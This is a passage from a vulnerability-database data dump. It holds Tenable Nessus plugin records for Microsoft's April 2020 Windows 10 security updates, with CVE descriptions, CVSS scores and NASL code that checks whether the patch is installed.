with full user\n rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550929/windows-10-update-kb4550929\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?24b003af\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550929.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550929');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550929])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-06T14:16:26", "description": "The remote Windows host is missing security update 4550927.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550927: Windows 10 Version 1709 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550927.NASL", "href": "https://www.tenable.com/plugins/nessus/135467", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135467);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550927\");\n script_xref(name:\"MSFT\", value:\"MS20-4550927\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550927: Windows 10 Version 1709 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550927.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. 